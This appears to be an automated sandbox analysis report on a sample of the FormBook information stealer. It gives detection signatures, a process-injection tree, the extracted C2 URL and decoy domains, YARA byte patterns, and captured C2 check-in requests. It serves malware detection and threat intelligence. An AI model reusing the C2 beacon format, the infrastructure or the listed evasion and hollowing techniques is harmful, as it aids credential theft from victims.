Loading ...

Play interactive tourEdit tour

Windows Analysis Report 9JzK89dRiaBYTuN.exe

Overview

General Information

Sample Name:9JzK89dRiaBYTuN.exe
Analysis ID:458757
MD5:d726ec6e056461dd7d3ce8890c3c9a4e
SHA1:4f6b524ab5fa51d9c5465572de8075c857afb686
SHA256:77d33d0e8b91781213a971ebc2e6abe4191bf2c28ff0ede19b07db092f590dff
Tags:exenull
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Process Start Without DLL
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 9JzK89dRiaBYTuN.exe (PID: 6048 cmdline: 'C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe' MD5: D726EC6E056461DD7D3CE8890C3C9A4E)
    • RegSvcs.exe (PID: 4260 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autofmt.exe (PID: 4024 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • cmmon32.exe (PID: 2904 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 6076 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.panyu-qqbaby.com/weni/"], "decoy": ["sdmdwang.com", "konversationswithkoshie.net", "carap.club", "eagldeream.com", "856380585.xyz", "elgallocoffee.com", "magetu.info", "lovertons.com", "theichallenge.com", "advancedautorepairsonline.com", "wingsstyling.info", "tapdaugusta.com", "wiloasbanhsgtarewdasc.solutions", "donjrisdumb.com", "experienceddoctor.com", "cloverhillconsultants.com", "underwear.show", "karensgonewild2020.com", "arodsr.com", "thefucktardmanual.com", "712kenwood.info", "telecompink.com", "ebizkendra.com", "kitkatmp3.com", "utformehagen.com", "profitsnavigator.com", "kathyharvey.com", "tongaoffshore.com", "vrpreservation.com", "hy7128.com", "nicolettejohnsonphotography.com", "rating.travel", "visualartcr.com", "nationalbarista.com", "lovecartoonforever.com", "koimkt.com", "directpractice.pro", "blockchaincloud360.com", "queverenbuenosaires.com", "coachmyragolden.com", "awree.com", "facebookipl.com", "rcheapwdbuy.com", "trinspinsgreen.com", "voxaide.com", "ecorner.online", "mattvickery.com", "regarta.com", "fknprfct.com", "theessentialstore.net", "sunilpsingh.com", "ovtnywveba.club", "optimalgafa.com", "awdjob.info", "humachem.com", "southeasternsteakcompany.com", "centerevents.net", "warrenswindowcleans.co.uk", "lebullterrier.com", "thecxchecker.com", "formerknown.com", "pupbutler.com", "tincanphones.com", "tgeuuy.cool"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.598731483.00000000008D0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.598731483.00000000008D0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.598731483.00000000008D0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.341797161.0000000002541000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      00000000.00000002.342547133.0000000003549000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        Click to see the 18 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.RegSvcs.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          1.2.RegSvcs.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x158b9:$sqlite3step: 68 34 1C 7B E1
          • 0x159cc:$sqlite3step: 68 34 1C 7B E1
          • 0x158e8:$sqlite3text: 68 38 2A 90 C5
          • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
          • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
          • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
          1.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            1.2.RegSvcs.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 8 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Suspicious Process Start Without DLLShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe' , ParentImage: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe, ParentProcessId: 6048, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 4260
            Sigma detected: Possible Applocker BypassShow sources
            Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe' , ParentImage: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe, ParentProcessId: 6048, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 4260

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus / Scanner detection for submitted sampleShow sources
            Source: 9JzK89dRiaBYTuN.exeAvira: detected
            Antivirus detection for URL or domainShow sources
            Source: www.panyu-qqbaby.com/weni/Avira URL Cloud: Label: malware
            Found malware configurationShow sources
            Source: 00000000.00000002.342547133.0000000003549000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.panyu-qqbaby.com/weni/"], "decoy": ["sdmdwang.com", "konversationswithkoshie.net", "carap.club", "eagldeream.com", "856380585.xyz", "elgallocoffee.com", "magetu.info", "lovertons.com", "theichallenge.com", "advancedautorepairsonline.com", "wingsstyling.info", "tapdaugusta.com", "wiloasbanhsgtarewdasc.solutions", "donjrisdumb.com", "experienceddoctor.com", "cloverhillconsultants.com", "underwear.show", "karensgonewild2020.com", "arodsr.com", "thefucktardmanual.com", "712kenwood.info", "telecompink.com", "ebizkendra.com", "kitkatmp3.com", "utformehagen.com", "profitsnavigator.com", "kathyharvey.com", "tongaoffshore.com", "vrpreservation.com", "hy7128.com", "nicolettejohnsonphotography.com", "rating.travel", "visualartcr.com", "nationalbarista.com", "lovecartoonforever.com", "koimkt.com", "directpractice.pro", "blockchaincloud360.com", "queverenbuenosaires.com", "coachmyragolden.com", "awree.com", "facebookipl.com", "rcheapwdbuy.com", "trinspinsgreen.com", "voxaide.com", "ecorner.online", "mattvickery.com", "regarta.com", "fknprfct.com", "theessentialstore.net", "sunilpsingh.com", "ovtnywveba.club", "optimalgafa.com", "awdjob.info", "humachem.com", "southeasternsteakcompany.com", "centerevents.net", "warrenswindowcleans.co.uk", "lebullterrier.com", "thecxchecker.com", "formerknown.com", "pupbutler.com", "tincanphones.com", "tgeuuy.cool"]}
            Multi AV Scanner detection for submitted fileShow sources
            Source: 9JzK89dRiaBYTuN.exeVirustotal: Detection: 57%Perma Link
            Source: 9JzK89dRiaBYTuN.exeReversingLabs: Detection: 75%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.9JzK89dRiaBYTuN.exe.3754088.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.9JzK89dRiaBYTuN.exe.35b0360.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.598731483.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.342547133.0000000003549000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.396448884.0000000001990000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.396143865.0000000001470000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.603676182.0000000002CC0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, type: MEMORY
            Machine Learning detection for sampleShow sources
            Source: 9JzK89dRiaBYTuN.exeJoe Sandbox ML: detected
            Source: 1.2.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 9JzK89dRiaBYTuN.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
            Source: 9JzK89dRiaBYTuN.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: cmmon32.pdb source: RegSvcs.exe, 00000001.00000002.396904315.0000000001D00000.00000040.00000001.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.368212816.000000000DC20000.00000002.00000001.sdmp
            Source: Binary string: cmmon32.pdbGCTL source: RegSvcs.exe, 00000001.00000002.396904315.0000000001D00000.00000040.00000001.sdmp
            Source: Binary string: RegSvcs.pdb, source: cmmon32.exe, 00000005.00000002.604383897.0000000002DF4000.00000004.00000020.sdmp
            Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, cmmon32.exe, 00000005.00000002.608906653.0000000004ACF000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, cmmon32.exe
            Source: Binary string: RegSvcs.pdb source: cmmon32.exe, 00000005.00000002.604383897.0000000002DF4000.00000004.00000020.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.368212816.000000000DC20000.00000002.00000001.sdmp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then pop esi
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then pop ebx
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then pop edi
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then pop edi
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop esi
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop ebx
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop edi
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop edi

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49731 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49731 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49731 -> 34.102.136.180:80
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.panyu-qqbaby.com/weni/
            Source: global trafficHTTP traffic detected: GET /weni/?Fzr4otMh=vK5NYeOz5XkzOmNWKQvXOgoJo3oDs/IT/QpSrvoL9TxdOASFPAP+KPQhIJ5bhzx72Ujc1GJYaw==&aRbdj=q6AlsppXkR0txTj HTTP/1.1Host: www.regarta.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /weni/?Fzr4otMh=5QGyFhC7d8SOfupCgf8D8L5Dw1IpKGdMSRgbjgwl2q0Kak4r1qcSYI6TGyMZI/ki/MDg/v9Fdw==&aRbdj=q6AlsppXkR0txTj HTTP/1.1Host: www.tapdaugusta.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /weni/?Fzr4otMh=BkpYm0nbd5ib+/fSGFV7l4XaMZIYy+faJJ1LkwLIu9AW6SncOXGggY2R9QUt+6zEXxQtwdedUg==&aRbdj=q6AlsppXkR0txTj HTTP/1.1Host: www.profitsnavigator.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /weni/?Fzr4otMh=ztAjwXyjR8Zhmz6qNG99UeVM/COU9vlr0gZS07ceR8+f8+nH1SwRALtGHqnV1JfTHENGVYv16A==&aRbdj=q6AlsppXkR0txTj HTTP/1.1Host: www.konversationswithkoshie.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /weni/?Fzr4otMh=+KyOLC6TyuKR3+iFgbwKS8GxhsjIjrhtsitDR0G1PeYPvoj9xIz7F4EITJbrl7lY/KKYumYMjw==&aRbdj=q6AlsppXkR0txTj HTTP/1.1Host: www.advancedautorepairsonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /weni/?Fzr4otMh=jQINVx1WLgI4Q78PxoFZgdCbTp62zPlUZKvRDpdtPyf3UmqyZOBTcqkgr6daQI/TgYuIT4+N1g==&aRbdj=q6AlsppXkR0txTj HTTP/1.1Host: www.lovertons.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /weni/?Fzr4otMh=9kFoto4nIUhkgP3Es+H36/ZMz7ns/MT8S+V4osXmeDelDelWvdLQo7Pbd8Te03qiHXqAR+RcrA==&aRbdj=q6AlsppXkR0txTj HTTP/1.1Host: www.utformehagen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 184.168.131.241 184.168.131.241
            Source: Joe Sandbox ViewASN Name: EGIHOSTINGUS EGIHOSTINGUS
            Source: Joe Sandbox ViewASN Name: WEBAIR-INTERNETUS WEBAIR-INTERNETUS
            Source: global trafficHTTP traffic detected: GET /weni/?Fzr4otMh=vK5NYeOz5XkzOmNWKQvXOgoJo3oDs/IT/QpSrvoL9TxdOASFPAP+KPQhIJ5bhzx72Ujc1GJYaw==&aRbdj=q6AlsppXkR0txTj HTTP/1.1Host: www.regarta.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /weni/?Fzr4otMh=5QGyFhC7d8SOfupCgf8D8L5Dw1IpKGdMSRgbjgwl2q0Kak4r1qcSYI6TGyMZI/ki/MDg/v9Fdw==&aRbdj=q6AlsppXkR0txTj HTTP/1.1Host: www.tapdaugusta.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /weni/?Fzr4otMh=BkpYm0nbd5ib+/fSGFV7l4XaMZIYy+faJJ1LkwLIu9AW6SncOXGggY2R9QUt+6zEXxQtwdedUg==&aRbdj=q6AlsppXkR0txTj HTTP/1.1Host: www.profitsnavigator.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /weni/?Fzr4otMh=ztAjwXyjR8Zhmz6qNG99UeVM/COU9vlr0gZS07ceR8+f8+nH1SwRALtGHqnV1JfTHENGVYv16A==&aRbdj=q6AlsppXkR0txTj HTTP/1.1Host: www.konversationswithkoshie.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /weni/?Fzr4otMh=+KyOLC6TyuKR3+iFgbwKS8GxhsjIjrhtsitDR0G1PeYPvoj9xIz7F4EITJbrl7lY/KKYumYMjw==&aRbdj=q6AlsppXkR0txTj HTTP/1.1Host: www.advancedautorepairsonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /weni/?Fzr4otMh=jQINVx1WLgI4Q78PxoFZgdCbTp62zPlUZKvRDpdtPyf3UmqyZOBTcqkgr6daQI/TgYuIT4+N1g==&aRbdj=q6AlsppXkR0txTj HTTP/1.1Host: www.lovertons.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /weni/?Fzr4otMh=9kFoto4nIUhkgP3Es+H36/ZMz7ns/MT8S+V4osXmeDelDelWvdLQo7Pbd8Te03qiHXqAR+RcrA==&aRbdj=q6AlsppXkR0txTj HTTP/1.1Host: www.utformehagen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: unknownDNS traffic detected: queries for: www.regarta.com
            Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: explorer.exe, 00000002.00000000.346086899.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: cmmon32.exe, 00000005.00000002.604875216.0000000002E3A000.00000004.00000020.sdmpString found in binary or memory: http://www.sdmdwang.com/weni/?Fzr4otMh=M4L27nnvKueB/wH9
            Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 00000002.00000000.367412042.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: 9JzK89dRiaBYTuN.exe, 00000000.00000002.341446378.0000000000988000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.9JzK89dRiaBYTuN.exe.3754088.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.9JzK89dRiaBYTuN.exe.35b0360.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.598731483.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.342547133.0000000003549000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.396448884.0000000001990000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.396143865.0000000001470000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.603676182.0000000002CC0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, type: MEMORY

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.9JzK89dRiaBYTuN.exe.3754088.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.9JzK89dRiaBYTuN.exe.3754088.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.9JzK89dRiaBYTuN.exe.35b0360.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.9JzK89dRiaBYTuN.exe.35b0360.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.598731483.00000000008D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
